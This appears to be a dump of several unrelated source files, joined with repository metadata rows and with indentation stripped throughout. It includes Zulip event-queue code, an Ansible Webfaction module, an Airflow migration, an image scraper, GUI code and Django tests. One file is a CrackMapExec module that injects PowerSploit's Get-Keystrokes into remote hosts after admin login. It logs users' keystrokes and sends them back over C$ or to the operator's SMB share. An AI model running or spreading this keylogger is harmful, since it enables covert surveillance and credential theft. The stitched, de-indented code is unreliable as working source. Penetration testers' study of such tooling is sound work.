clients[id] = client
add_to_client_dicts(client)
return client
def do_gc_event_queues(to_remove, affected_users, affected_realms):
def filter_client_dict(client_dict, key):
if key not in client_dict:
return
new_client_list = filter(lambda c: c.event_queue.id not in to_remove,
client_dict[key])
if len(new_client_list) == 0:
del client_dict[key]
else:
client_dict[key] = new_client_list
for user_id in affected_users:
filter_client_dict(user_clients, user_id)
for realm_id in affected_realms:
filter_client_dict(realm_clients_all_streams, realm_id)
for id in to_remove:
for cb in gc_hooks:
cb(clients[id].user_profile_id, clients[id], clients[id].user_profile_id not in user_clients)
del clients[id]
def gc_event_queues():
start = time.time()
to_remove = set()
affected_users = set()
affected_realms = set()
for (id, client) in clients.iteritems():
if client.idle(start):
to_remove.add(id)
affected_users.add(client.user_profile_id)
affected_realms.add(client.realm_id)
do_gc_event_queues(to_remove, affected_users, affected_realms)
logging.info(('Tornado removed %d idle event queues owned by %d users in %.3fs.'
+ ' Now %d active queues')
% (len(to_remove), len(affected_users), time.time() - start,
len(clients)))
statsd.gauge('tornado.active_queues', len(clients))
statsd.gauge('tornado.active_users', len(user_clients))
def dump_event_queues():
start = time.time()
with file(settings.JSON_PERSISTENT_QUEUE_FILENAME, "w") as stored_queues:
ujson.dump([(qid, client.to_dict()) for (qid, client) in clients.iteritems()],
stored_queues)
logging.info('Tornado dumped %d event queues in %.3fs'
% (len(clients), time.time() - start))
def load_event_queues():
global clients
start = time.time()
if os.path.exists(settings.PERSISTENT_QUEUE_FILENAME):
try:
with file(settings.PERSISTENT_QUEUE_FILENAME, "r") as stored_queues:
clients = pickle.load(stored_queues)
except (IOError, EOFError):
pass
else:
# ujson chokes on bad input pretty easily. We separate out the actual
# file reading from the loading so that we don't silently fail if we get
# bad input.
try:
with file(settings.JSON_PERSISTENT_QUEUE_FILENAME, "r") as stored_queues:
json_data = stored_queues.read()
try:
clients = dict((qid, ClientDescriptor.from_dict(client))
for (qid, client) in ujson.loads(json_data))
except Exception:
logging.exception("Could not deserialize event queues")
except (IOError, EOFError):
pass
for client in clients.itervalues():
# Put code for migrations due to event queue data format changes here
add_to_client_dicts(client)
logging.info('Tornado loaded %d event queues in %.3fs'
% (len(clients), time.time() - start))
def send_restart_events():
event = dict(type='restart', server_generation=settings.SERVER_GENERATION)
for client in clients.itervalues():
if client.accepts_event(event):
client.add_event(event.copy())
def setup_event_queue():
load_event_queues()
atexit.register(dump_event_queues)
# Make sure we dump event queues even if we exit via signal
signal.signal(signal.SIGTERM, lambda signum, stack: sys.exit(1))
try:
os.rename(settings.PERSISTENT_QUEUE_FILENAME, "/var/tmp/event_queues.pickle.last")
except OSError:
pass
try:
os.rename(settings.JSON_PERSISTENT_QUEUE_FILENAME, "/var/tmp/event_queues.json.last")
except OSError:
pass
# Set up event queue garbage collection
ioloop = tornado.ioloop.IOLoop.instance()
pc = tornado.ioloop.PeriodicCallback(gc_event_queues,
EVENT_QUEUE_GC_FREQ_MSECS, ioloop)
pc.start()
send_restart_events()
# The following functions are called from Django
# Workaround to support the Python-requests 1.0 transition of .json
# from a property to a function
requests_json_is_function = callable(requests.Response.json)
def extract_json_response(resp):
if requests_json_is_function:
return resp.json()
else:
return resp.json
def request_event_queue(user_profile, user_client, apply_markdown,
queue_lifespan_secs, event_types=None, all_public_streams=False,
narrow=[]):
if settings.TORNADO_SERVER:
req = {'dont_block' : 'true',
'apply_markdown': ujson.dumps(apply_markdown),
'all_public_streams': ujson.dumps(all_public_streams),
'client' : 'internal',
'user_client' : user_client.name,
'narrow' : ujson.dumps(narrow),
'lifespan_secs' : queue_lifespan_secs}
if event_types is not None:
req['event_types'] = ujson.dumps(event_types)
resp = requests.get(settings.TORNADO_SERVER + '/api/v1/events',
auth=requests.auth.HTTPBasicAuth(user_profile.email,
user_profile.api_key),
params=req)
resp.raise_for_status()
return extract_json_response(resp)['queue_id']
return None
def get_user_events(user_profile, queue_id, last_event_id):
if settings.TORNADO_SERVER:
resp = requests.get(settings.TORNADO_SERVER + '/api/v1/events',
auth=requests.auth.HTTPBasicAuth(user_profile.email,
user_profile.api_key),
params={'queue_id' : queue_id,
'last_event_id': last_event_id,
'dont_block' : 'true',
'client' : 'internal'})
resp.raise_for_status()
return extract_json_response(resp)['events']
# Send email notifications to idle users
# after they are idle for 1 hour
NOTIFY_AFTER_IDLE_HOURS = 1
def build_offline_notification(user_profile_id, message_id):
return {"user_profile_id": user_profile_id,
"message_id": message_id,
"timestamp": time.time()}
def missedmessage_hook(user_profile_id, queue, last_for_client):
# Only process missedmessage hook when the last queue for a
# client has been garbage collected
if not last_for_client:
return
message_ids_to_notify = []
for event in queue.event_queue.contents():
if not event['type'] == 'message' or not event['flags']:
continue
if 'mentioned' in event['flags'] and not 'read' in event['flags']:
notify_info = dict(message_id=event['message']['id'])
if not event.get('push_notified', False):
notify_info['send_push'] = True
if not event.get('email_notified', False):
notify_info['send_email'] = True
message_ids_to_notify.append(notify_info)
for notify_info in message_ids_to_notify:
msg_id = notify_info['message_id']
notice = build_offline_notification(user_profile_id, msg_id)
if notify_info.get('send_push', False):
queue_json_publish("missedmessage_mobile_notifications", notice, lambda notice: None)
if notify_info.get('send_email', False):
queue_json_publish("missedmessage_emails", notice, lambda notice: None)
@cache_with_key(message_cache_key, timeout=3600*24)
def get_message_by_id_dbwarn(message_id):
if not settings.TEST_SUITE:
logging.warning("Tornado failed to load message from memcached when delivering!")
return Message.objects.select_related().get(id=message_id)
def receiver_is_idle(user_profile_id, realm_presences):
# If a user has no message-receiving event queues, they've got no open zulip
# session so we notify them
all_client_descriptors = get_client_descriptors_for_user(user_profile_id)
message_event_queues = [client for client in all_client_descriptors if client.accepts_messages()]
off_zulip = len(message_event_queues) == 0
# It's possible a recipient is not in the realm of a sender. We don't have
# presence information in this case (and it's hard to get without an additional
# db query) so we simply don't try to guess if this cross-realm recipient
# has been idle for too long
if realm_presences is None or not user_profile_id in realm_presences:
return off_zulip
# We want to find the newest "active" presence entity and compare that to the
# activity expiry threshold.
user_presence = realm_presences[user_profile_id]
latest_active_timestamp = None
idle = False
for client, status in user_presence.iteritems():
if (latest_active_timestamp is None or status['timestamp'] > latest_active_timestamp) and \
status['status'] == 'active':
latest_active_timestamp = status['timestamp']
if latest_active_timestamp is None:
idle = True
else:
active_datetime = timestamp_to_datetime(latest_active_timestamp)
# 140 seconds is consistent with activity.js:OFFLINE_THRESHOLD_SECS
idle = now() - active_datetime > datetime.timedelta(seconds=140)
return off_zulip or idle
def process_message_event(event_template, users):
realm_presences = {int(k): v for k, v in event_template['presences'].items()}
sender_queue_id = event_template.get('sender_queue_id', None)
if "message_dict_markdown" in event_template:
message_dict_markdown = event_template['message_dict_markdown']
message_dict_no_markdown = event_template['message_dict_no_markdown']
else:
# We can delete this and get_message_by_id_dbwarn after the
# next prod deploy
message = get_message_by_id_dbwarn(event_template['message'])
message_dict_markdown = message.to_dict(True)
message_dict_no_markdown = message.to_dict(False)
sender_id = message_dict_markdown['sender_id']
message_id = message_dict_markdown['id']
message_type = message_dict_markdown['type']
sending_client = message_dict_markdown['client']
# To remove duplicate clients: Maps queue ID to {'client': Client, 'flags': flags}
send_to_clients = dict()
# Extra user-specific data to include
extra_user_data = {}
if 'stream_name' in event_template and not event_template.get("invite_only"):
for client in get_client_descriptors_for_realm_all_streams(event_template['realm_id']):
send_to_clients[client.event_queue.id] = {'client': client, 'flags': None}
if sender_queue_id is not None and client.event_queue.id == sender_queue_id:
send_to_clients[client.event_queue.id]['is_sender'] = True
for user_data in users:
user_profile_id = user_data['id']
flags = user_data.get('flags', [])
for client in get_client_descriptors_for_user(user_profile_id):
send_to_clients[client.event_queue.id] = {'client': client, 'flags': flags}
if sender_queue_id is not None and client.event_queue.id == sender_queue_id:
send_to_clients[client.event_queue.id]['is_sender'] = True
# If the recipient was offline and the message was a single or group PM to him
# or she was @-notified potentially notify more immediately
received_pm = message_type == "private" and user_profile_id != sender_id
mentioned = 'mentioned' in flags
idle = receiver_is_idle(user_profile_id, realm_presences)
always_push_notify = user_data.get('always_push_notify', False)
if (received_pm or mentioned) and (idle or always_push_notify):
notice = build_offline_notification(user_profile_id, message_id)
queue_json_publish("missedmessage_mobile_notifications", notice, lambda notice: None)
notified = dict(push_notified=True)
# Don't send missed message emails if always_push_notify is True
if idle:
# We require RabbitMQ to do this, as we can't call the email handler
# from the Tornado process. So if there's no rabbitmq support do nothing
queue_json_publish("missedmessage_emails", notice, lambda notice: None)
notified['email_notified'] = True
extra_user_data[user_profile_id] = notified
for client_data in send_to_clients.itervalues():
client = client_data['client']
flags = client_data['flags']
is_sender = client_data.get('is_sender', False)
extra_data = extra_user_data.get(client.user_profile_id, None)
if not client.accepts_messages():
# The actual check is the accepts_event() check below;
# this line is just an optimization to avoid copying
# message data unnecessarily
continue
if client.apply_markdown:
message_dict = message_dict_markdown
else:
message_dict = message_dict_no_markdown
# Make sure Zephyr mirroring bots know whether stream is invite-only
if "mirror" in client.client_type.name and event_template.get("invite_only"):
message_dict = message_dict.copy()
message_dict["invite_only_stream"] = True
user_event = dict(type='message', message=message_dict, flags=flags)
if extra_data is not None:
user_event.update(extra_data)
if is_sender:
local_message_id = event_template.get('local_id', None)
if local_message_id is not None:
user_event["local_message_id"] = local_message_id
if not client.accepts_event(user_event):
continue
# The below prevents (Zephyr) mirroring loops.
if ('mirror' in sending_client and
sending_client.lower() == client.client_type.name.lower()):
continue
client.add_event(user_event)
def process_event(event, users):
for user_profile_id in users:
for client in get_client_descriptors_for_user(user_profile_id):
if client.accepts_event(event):
client.add_event(event.copy())
def process_userdata_event(event_template, users):
for user_data in users:
user_profile_id = user_data['id']
user_event = event_template.copy() # shallow, but deep enough for our needs
for key in user_data.keys():
if key != "id":
user_event[key] = user_data[key]
for client in get_client_descriptors_for_user(user_profile_id):
if client.accepts_event(user_event):
client.add_event(user_event)
def process_notification(notice):
event = notice['event']
users = notice['users']
if event['type'] in ["update_message"]:
process_userdata_event(event, users)
elif event['type'] == "message":
process_message_event(event, users)
else:
process_event(event, users)
# Runs in the Django process to send a notification to Tornado.
#
# We use JSON rather than bare form parameters, so that we can represent
# different types and for compatibility with non-HTTP transports.
def send_notification_http(data):
if settings.TORNADO_SERVER and not settings.RUNNING_INSIDE_TORNADO:
requests.post(settings.TORNADO_SERVER + '/notify_tornado', data=dict(
data = ujson.dumps(data),
secret = settings.SHARED_SECRET))
else:
process_notification(data)
def send_notification(data):
return queue_json_publish("notify_tornado", data, send_notification_http)
def send_event(event, users):
return queue_json_publish("notify_tornado",
dict(event=event, users=users),
send_notification_http)
| apache-2.0 | 107,240,590,736,527,000 | 40.432815 | 112 | 0.619807 | false |
frenchfrywpepper/ansible-modules-extras | cloud/webfaction/webfaction_site.py | 62 | 6939 | #!/usr/bin/python
#
# Create Webfaction website using Ansible and the Webfaction API
#
# ------------------------------------------
#
# (c) Quentin Stafford-Fraser 2015
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
DOCUMENTATION = '''
---
module: webfaction_site
short_description: Add or remove a website on a Webfaction host
description:
- Add or remove a website on a Webfaction host. Further documentation at http://github.com/quentinsf/ansible-webfaction.
author: Quentin Stafford-Fraser (@quentinsf)
version_added: "2.0"
notes:
- Sadly, you I(do) need to know your webfaction hostname for the C(host) parameter. But at least, unlike the API, you don't need to know the IP address - you can use a DNS name.
- If a site of the same name exists in the account but on a different host, the operation will exit.
- "You can run playbooks that use this on a local machine, or on a Webfaction host, or elsewhere, since the scripts use the remote webfaction API - the location is not important. However, running them on multiple hosts I(simultaneously) is best avoided. If you don't specify I(localhost) as your host, you may want to add C(serial: 1) to the plays."
- See `the webfaction API <http://docs.webfaction.com/xmlrpc-api/>`_ for more info.
options:
name:
description:
- The name of the website
required: true
state:
description:
- Whether the website should exist
required: false
choices: ['present', 'absent']
default: "present"
host:
description:
- The webfaction host on which the site should be created.
required: true
https:
description:
- Whether or not to use HTTPS
required: false
choices:
- true
- false
default: 'false'
site_apps:
description:
- A mapping of URLs to apps
required: false
subdomains:
description:
- A list of subdomains associated with this site.
required: false
default: null
login_name:
description:
- The webfaction account to use
required: true
login_password:
description:
- The webfaction password to use
required: true
'''
EXAMPLES = '''
- name: create website
webfaction_site:
name: testsite1
state: present
host: myhost.webfaction.com
subdomains:
- 'testsite1.my_domain.org'
site_apps:
- ['testapp1', '/']
https: no
login_name: "{{webfaction_user}}"
login_password: "{{webfaction_passwd}}"
'''
import socket
import xmlrpclib
webfaction = xmlrpclib.ServerProxy('https://api.webfaction.com/')
def main():
module = AnsibleModule(
argument_spec = dict(
name = dict(required=True),
state = dict(required=False, choices=['present', 'absent'], default='present'),
# You can specify an IP address or hostname.
host = dict(required=True),
https = dict(required=False, type='bool', default=False),
subdomains = dict(required=False, type='list', default=[]),
site_apps = dict(required=False, type='list', default=[]),
login_name = dict(required=True),
login_password = dict(required=True),
),
supports_check_mode=True
)
site_name = module.params['name']
site_state = module.params['state']
site_host = module.params['host']
site_ip = socket.gethostbyname(site_host)
session_id, account = webfaction.login(
module.params['login_name'],
module.params['login_password']
)
site_list = webfaction.list_websites(session_id)
site_map = dict([(i['name'], i) for i in site_list])
existing_site = site_map.get(site_name)
result = {}
# Here's where the real stuff happens
if site_state == 'present':
# Does a site with this name already exist?
if existing_site:
# If yes, but it's on a different IP address, then fail.
# If we wanted to allow relocation, we could add a 'relocate=true' option
# which would get the existing IP address, delete the site there, and create it
# at the new address. A bit dangerous, perhaps, so for now we'll require manual
# deletion if it's on another host.
if existing_site['ip'] != site_ip:
module.fail_json(msg="Website already exists with a different IP address. Please fix by hand.")
# If it's on this host and the key parameters are the same, nothing needs to be done.
if (existing_site['https'] == module.boolean(module.params['https'])) and \
(set(existing_site['subdomains']) == set(module.params['subdomains'])) and \
(dict(existing_site['website_apps']) == dict(module.params['site_apps'])):
module.exit_json(
changed = False
)
positional_args = [
session_id, site_name, site_ip,
module.boolean(module.params['https']),
module.params['subdomains'],
]
for a in module.params['site_apps']:
positional_args.append( (a[0], a[1]) )
if not module.check_mode:
# If this isn't a dry run, create or modify the site
result.update(
webfaction.create_website(
*positional_args
) if not existing_site else webfaction.update_website (
*positional_args
)
)
elif site_state == 'absent':
# If the site's already not there, nothing changed.
if not existing_site:
module.exit_json(
changed = False,
)
if not module.check_mode:
# If this isn't a dry run, delete the site
result.update(
webfaction.delete_website(session_id, site_name, site_ip)
)
else:
module.fail_json(msg="Unknown state specified: {}".format(site_state))
module.exit_json(
changed = True,
result = result
)
from ansible.module_utils.basic import *
main()
| gpl-3.0 | 6,347,011,683,296,304,000 | 32.042857 | 353 | 0.602536 | false |
jgao54/airflow | airflow/migrations/versions/a56c9515abdc_remove_dag_stat_table.py | 6 | 1581 | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Remove dag_stat table
Revision ID: a56c9515abdc
Revises: c8ffec048a3b
Create Date: 2018-12-27 10:27:59.715872
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'a56c9515abdc'
down_revision = 'c8ffec048a3b'
branch_labels = None
depends_on = None
def upgrade():
op.drop_table("dag_stats")
def downgrade():
op.create_table('dag_stats',
sa.Column('dag_id', sa.String(length=250), nullable=False),
sa.Column('state', sa.String(length=50), nullable=False),
sa.Column('count', sa.Integer(), nullable=False, default=0),
sa.Column('dirty', sa.Boolean(), nullable=False, default=False),
sa.PrimaryKeyConstraint('dag_id', 'state'))
| apache-2.0 | 4,174,148,292,197,796,000 | 32.638298 | 84 | 0.701455 | false |
shintoo/DailyImage | getimage.py | 1 | 1515 | #!/usr/bin/python
# getimage.py - this file is part of dailyimage
# Retrieve an image from a google image search
import sys # argv
import re # finding images
import requests # downloading results and images
import bs4 # finding images
def get_image(query):
'''
function get_image
generator
arguments:
query: string
yields:
Raw image data retrieved from a google image search of the query
'''
# URL for the image search
url = 'https://www.google.com/search?tbm=isch&q=' + query
# Download the result
res = requests.get(url)
# Check for error code
res.raise_for_status()
# Generate the parser
Soup = bs4.BeautifulSoup(res.text, 'lxml')
# Find each image - in this case, the thumbnail of each result
images = Soup.findAll('img')
for img in images:
# Find all images with 'gstatic.com' in their src
search = re.search('gstatic.com', img['src'])
if search:
# Download the image
raw_image = requests.get(img['src'])
raw_image.raise_for_status()
# yield the raw binary data
yield raw_image.content
def main(argv):
if len(argv) != 2:
print('usage: getimage.py query')
get_image(argv[1]) # begin generator
print('Saving ' + argv[1] + '_image...')
fp = open(argv[1] + '_image', 'wb')
fp.write(next(get_image(argv[1])))
fp.close()
if __name__ == '__main__':
main(sys.argv)
| mit | 7,848,023,688,976,881,000 | 26.053571 | 72 | 0.594719 | false |
jorik041/CrackMapExec | cme/modules/get_keystrokes.py | 1 | 4591 | from cme.helpers.powershell import *
from cme.helpers.misc import gen_random_string
from cme.servers.smb import CMESMBServer
from gevent import sleep
from sys import exit
import os
class CMEModule:
'''
Executes PowerSploit's Get-Keystrokes script
Module by @byt3bl33d3r
'''
name = 'get_keystrokes'
description = "Logs keys pressed, time and the active window"
supported_protocols = ['smb', 'mssql']
opsec_safe = True
multiple_hosts = True
def options(self, context, module_options):
'''
TIMEOUT Specifies the interval in minutes to capture keystrokes.
STREAM Specifies whether to stream the keys over the network (default: False)
POLL Specifies the interval in seconds to poll the log file (default: 20)
'''
if 'TIMEOUT' not in module_options:
context.log.error('TIMEOUT option is required!')
exit(1)
self.stream = False
self.poll = 20
self.timeout = int(module_options['TIMEOUT'])
if 'STREAM' in module_options:
self.stream = bool(module_options['STREAM'])
if 'POLL' in module_options:
self.poll = int(module_options['POLL'])
context.log.info('This module will not exit until CTRL-C is pressed')
context.log.info('Keystrokes will be stored in ~/.cme/logs\n')
self.ps_script1 = obfs_ps_script('cme_powershell_scripts/Invoke-PSInject.ps1')
self.ps_script2 = obfs_ps_script('powersploit/Exfiltration/Get-Keystrokes.ps1')
if self.stream:
self.share_name = gen_random_string(5).upper()
self.smb_server = CMESMBServer(context.log, self.share_name, context.log_folder_path)
self.smb_server.start()
else:
self.file_name = gen_random_string(5)
def on_admin_login(self, context, connection):
keys_folder = 'get_keystrokes_{}'.format(connection.host)
if not self.stream:
command = 'Get-Keystrokes -LogPath "$Env:Temp\\{}" -Timeout {}'.format(self.file_name, self.timeout)
else:
command = 'Get-Keystrokes -LogPath \\\\{}\\{}\\{}\\keys.log -Timeout {}'.format(context.localip, self.share_name, keys_folder, self.timeout)
keys_command = gen_ps_iex_cradle(context, 'Get-Keystrokes.ps1', command, post_back=False)
launcher = gen_ps_inject(keys_command, context)
connection.ps_execute(launcher)
context.log.success('Executed launcher')
if not self.stream:
users = connection.loggedon_users()
keys_folder_path = os.path.join(context.log_folder_path, keys_folder)
try:
while True:
for user in users:
if '$' not in user.wkui1_username and os.path.exists(keys_folder_path):
keys_log = os.path.join(keys_folder_path, 'keys_{}.log'.format(user.wkui1_username))
with open(keys_log, 'a+') as key_file:
file_path = '/Users/{}/AppData/Local/Temp/{}'.format(user.wkui1_username, self.file_name)
try:
connection.conn.getFile('C$', file_path, key_file.write)
context.log.success('Got keys! Stored in {}'.format(keys_log))
except Exception as e:
context.log.debug('Error retrieving key file contents from {}: {}'.format(file_path, e))
sleep(self.poll)
except KeyboardInterrupt:
pass
def on_request(self, context, request):
if 'Invoke-PSInject.ps1' == request.path[1:]:
request.send_response(200)
request.end_headers()
request.wfile.write(self.ps_script1)
elif 'Get-Keystrokes.ps1' == request.path[1:]:
request.send_response(200)
request.end_headers()
# We received the callback, so lets setup the folder to store the keys
keys_folder_path = os.path.join(context.log_folder_path, 'get_keystrokes_{}'.format(request.client_address[0]))
if not os.path.exists(keys_folder_path): os.mkdir(keys_folder_path)
request.wfile.write(self.ps_script2)
request.stop_tracking_host()
else:
request.send_response(404)
request.end_headers()
def on_shutdown(self, context, connection):
if self.stream:
self.smb_server.shutdown()
| bsd-2-clause | 3,567,030,608,053,592,000 | 39.27193 | 152 | 0.587672 | false |
foursquare/commons-old | src/python/twitter/common/log/formatters/plain.py | 16 | 1610 | # ==================================================================================================
# Copyright 2011 Twitter, Inc.
# --------------------------------------------------------------------------------------------------
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this work except in compliance with the License.
# You may obtain a copy of the License in the LICENSE file, or at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==================================================================================================
import logging
from twitter.common.log.formatters.base import format_message
class PlainFormatter(logging.Formatter):
"""
Format a log in a plainer style:
type] msg
"""
SCHEME = 'plain'
LEVEL_MAP = {
logging.FATAL: 'FATAL',
logging.ERROR: 'ERROR',
logging.WARN: ' WARN',
logging.INFO: ' INFO',
logging.DEBUG: 'DEBUG'
}
def __init__(self):
logging.Formatter.__init__(self)
def format(self, record):
try:
level = PlainFormatter.LEVEL_MAP[record.levelno]
except:
level = '?????'
record_message = '%s] %s' % (level, format_message(record))
record.getMessage = lambda: record_message
return logging.Formatter.format(self, record)
| apache-2.0 | 8,593,446,183,882,732,000 | 34.777778 | 100 | 0.565217 | false |
scootergrisen/virtaal | virtaal/views/langview.py | 6 | 8842 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2009-2011 Zuza Software Foundation
#
# This file is part of Virtaal.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>.
import os
import gobject
import gtk
import gtk.gdk
import logging
from virtaal.common import GObjectWrapper
from virtaal.models.langmodel import LanguageModel
from baseview import BaseView
from widgets.popupmenubutton import PopupMenuButton
class LanguageView(BaseView):
"""
Manages the language selection on the GUI and communicates with its associated
C{LanguageController}.
"""
# INITIALIZERS #
def __init__(self, controller):
self.controller = controller
self._init_gui()
def _create_dialogs(self):
from widgets.langselectdialog import LanguageSelectDialog
from widgets.langadddialog import LanguageAddDialog
langs = [LanguageModel(lc) for lc in LanguageModel.languages]
langs.sort(key=lambda x: x.name)
self.select_dialog = LanguageSelectDialog(langs, parent=self.controller.main_controller.view.main_window)
self.select_dialog.btn_add.connect('clicked', self._on_addlang_clicked)
self.add_dialog = LanguageAddDialog(parent=self.select_dialog.dialog)
def _init_gui(self):
self.menu = None
self.popupbutton = PopupMenuButton()
self.popupbutton.connect('toggled', self._on_button_toggled)
self.controller.main_controller.view.main_window.connect(
'style-set', self._on_style_set
)
if self.controller.recent_pairs:
self.popupbutton.text = self._get_display_string(*self.controller.recent_pairs[0])
def _init_menu(self):
self.menu = gtk.Menu()
self.popupbutton.set_menu(self.menu)
self.recent_items = []
for i in range(self.controller.NUM_RECENT):
item = gtk.MenuItem('')
item.connect('activate', self._on_pairitem_activated, i)
self.recent_items.append(item)
seperator = gtk.SeparatorMenuItem()
self.other_item = gtk.MenuItem(_('_New Language Pair...'))
self.other_item.connect('activate', self._on_other_activated)
[self.menu.append(item) for item in (seperator, self.other_item)]
self.update_recent_pairs()
self.controller.main_controller.view.main_window.connect(
'style-set', self._on_style_set
)
# METHODS #
def _get_display_string(self, srclang, tgtlang):
if self.popupbutton.get_direction() == gtk.TEXT_DIR_RTL:
# We need to make sure we get the direction correct if the
# language names are untranslated. The right-to-left embedding
# (RLE) characters ensure that untranslated language names will
# still diplay with the correct direction as they are present
# in the interface.
pairlabel = u'\u202b%s ← \u202b%s' % (srclang.name, tgtlang.name)
else:
pairlabel = u'%s → %s' % (srclang.name, tgtlang.name)
# While it seems that the arrows are not well supported on Windows
# systems, we fall back to using the French quotes. It automatically
# does the right thing for RTL.
if os.name == 'nt':
pairlabel = u'%s » %s' % (srclang.name, tgtlang.name)
return pairlabel
def notify_same_langs(self):
def notify():
for s in [gtk.STATE_ACTIVE, gtk.STATE_NORMAL, gtk.STATE_PRELIGHT, gtk.STATE_SELECTED]:
self.popupbutton.child.modify_fg(s, gtk.gdk.color_parse('#f66'))
gobject.idle_add(notify)
def notify_diff_langs(self):
def notify():
if hasattr(self, 'popup_default_fg'):
fgcol = self.popup_default_fg
else:
fgcol = gtk.widget_get_default_style().fg
for s in [gtk.STATE_ACTIVE, gtk.STATE_NORMAL, gtk.STATE_PRELIGHT, gtk.STATE_SELECTED]:
self.popupbutton.child.modify_fg(s, fgcol[s])
gobject.idle_add(notify)
def show(self):
"""Add the managed C{PopupMenuButton} to the C{MainView}'s status bar."""
statusbar = self.controller.main_controller.view.status_bar
for child in statusbar.get_children():
if child is self.popupbutton:
return
statusbar.pack_end(self.popupbutton, expand=False)
statusbar.show_all()
def focus(self):
self.popupbutton.grab_focus()
def update_recent_pairs(self):
if not self.menu:
self._init_menu()
# Clear all menu items
for i in range(self.controller.NUM_RECENT):
item = self.recent_items[i]
if item.parent is self.menu:
item.get_child().set_text('')
self.menu.remove(item)
# Update menu items' strings
i = 0
for pair in self.controller.recent_pairs:
if i not in range(self.controller.NUM_RECENT):
break
self.recent_items[i].get_child().set_text_with_mnemonic(
"_%(accesskey)d. %(language_pair)s" % {
"accesskey": i + 1,
"language_pair": self._get_display_string(*pair)
}
)
i += 1
# Re-add menu items that have something to show
for i in range(self.controller.NUM_RECENT):
item = self.recent_items[i]
if item.get_child().get_text():
self.menu.insert(item, i)
self.menu.show_all()
self.popupbutton.text = self.recent_items[0].get_child().get_text()[3:]
# EVENT HANDLERS #
def _on_addlang_clicked(self, button):
if not self.add_dialog.run():
return
err = self.add_dialog.check_input_sanity()
if err:
self.controller.main_controller.show_error(err)
return
name = self.add_dialog.langname
code = self.add_dialog.langcode
nplurals = self.add_dialog.nplurals
plural = self.add_dialog.plural
if self.add_dialog.langcode in LanguageModel.languages:
raise Exception('Language code %s already used.' % (code))
LanguageModel.languages[code] = (name, nplurals, plural)
self.controller.new_langs.append(code)
# Reload the language data in the selection dialog.
self.select_dialog.clear_langs()
langs = [LanguageModel(lc) for lc in LanguageModel.languages]
langs.sort(key=lambda x: x.name)
self.select_dialog.update_languages(langs)
def _on_button_toggled(self, popupbutton):
if not popupbutton.get_active():
return
detected = self.controller.get_detected_langs()
if detected and len(detected) == 2 and detected[0] and detected[1]:
logging.debug("Detected language pair: %s -> %s" % (detected[0].code, detected[1].code))
if detected not in self.controller.recent_pairs:
if len(self.controller.recent_pairs) >= self.controller.NUM_RECENT:
self.controller.recent_pairs[-1] = detected
else:
self.controller.recent_pairs.append(detected)
self.update_recent_pairs()
def _on_other_activated(self, menuitem):
if not getattr(self, 'select_dialog', None):
self._create_dialogs()
if self.select_dialog.run(self.controller.source_lang.code, self.controller.target_lang.code):
self.controller.set_language_pair(
self.select_dialog.get_selected_source_lang(),
self.select_dialog.get_selected_target_lang()
)
self.controller.main_controller.unit_controller.view.targets[0].grab_focus()
def _on_pairitem_activated(self, menuitem, item_n):
logging.debug('Selected language pair: %s' % (self.recent_items[item_n].get_child().get_text()))
pair = self.controller.recent_pairs[item_n]
self.controller.set_language_pair(*pair)
self.controller.main_controller.unit_controller.view.targets[0].grab_focus()
def _on_style_set(self, widget, prev_style):
if not hasattr(self, 'popup_default_fg'):
self.popup_default_fg = widget.style.fg
| gpl-2.0 | -1,565,351,128,856,898,800 | 38.450893 | 113 | 0.628607 | false |
mshafiq9/django | tests/template_tests/filter_tests/test_truncatewords.py | 215 | 1705 | from django.template.defaultfilters import truncatewords
from django.test import SimpleTestCase
from django.utils.safestring import mark_safe
from ..utils import setup
class TruncatewordsTests(SimpleTestCase):
@setup({'truncatewords01':
'{% autoescape off %}{{ a|truncatewords:"2" }} {{ b|truncatewords:"2"}}{% endautoescape %}'})
def test_truncatewords01(self):
output = self.engine.render_to_string('truncatewords01', {'a': 'alpha & bravo', 'b': mark_safe('alpha & bravo')})
self.assertEqual(output, 'alpha & ... alpha & ...')
@setup({'truncatewords02': '{{ a|truncatewords:"2" }} {{ b|truncatewords:"2"}}'})
def test_truncatewords02(self):
output = self.engine.render_to_string('truncatewords02', {'a': 'alpha & bravo', 'b': mark_safe('alpha & bravo')})
self.assertEqual(output, 'alpha & ... alpha & ...')
class FunctionTests(SimpleTestCase):
def test_truncate(self):
self.assertEqual(truncatewords('A sentence with a few words in it', 1), 'A ...')
def test_truncate2(self):
self.assertEqual(
truncatewords('A sentence with a few words in it', 5),
'A sentence with a few ...',
)
def test_overtruncate(self):
self.assertEqual(
truncatewords('A sentence with a few words in it', 100),
'A sentence with a few words in it',
)
def test_invalid_number(self):
self.assertEqual(
truncatewords('A sentence with a few words in it', 'not a number'),
'A sentence with a few words in it',
)
